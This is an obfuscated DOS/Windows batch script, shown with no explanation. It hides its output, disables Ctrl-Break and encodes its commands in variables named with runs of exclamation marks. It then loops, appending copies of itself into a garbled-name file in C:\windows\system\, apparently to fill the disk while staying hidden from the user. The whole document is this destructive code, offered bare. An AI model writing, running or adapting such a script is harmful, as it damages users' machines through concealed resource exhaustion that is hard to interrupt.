cTTy NuL
eCHo OFf
BReAk oFf
Set !!!!!!!!!=cOPy
sEt !!!!!!!!=CLs
seT !!!!!!!=gOTo LoOp
Set !!!!!!=:LoOp
sEt !!!!!=%0
seT !!!!=C:\
Set !!!=windows\
sEt !!=system\
seT !=öèÊ»ôç§°
%!!!!!!%
%!!!!!!!!!% %!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%>>%!!!!%%!!!%%!!%%!%
%!!!!!!!!!% %!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%>>%!!!!%%!!!%%!!%%!%
%!!!!!!!!!% %!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%>>%!!!!%%!!!%%!!%%!%
%!!!!!!!!!% %!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%>>%!!!!%%!!!%%!!%%!%
%!!!!!!!!!% %!!!!!%+%!!!!!%+%!!!!!%+%!!!!!%>>%!!!!%%!!!%%!!%%!%
%!!!!!!!!!% %!!!!!%+%!!!!!%+%!!!!!%>>%!!!!%%!!!%%!!%%!%
%!!!!!!!!!% %!!!!!%+%!!!!!%>>%!!!!%%!!!%%!!%%!%
%!!!!!!!!!% %!!!!!%>>%!!!!%%!!!%%!!%%!%
%!!!!!!!%
%!!!!!!!!%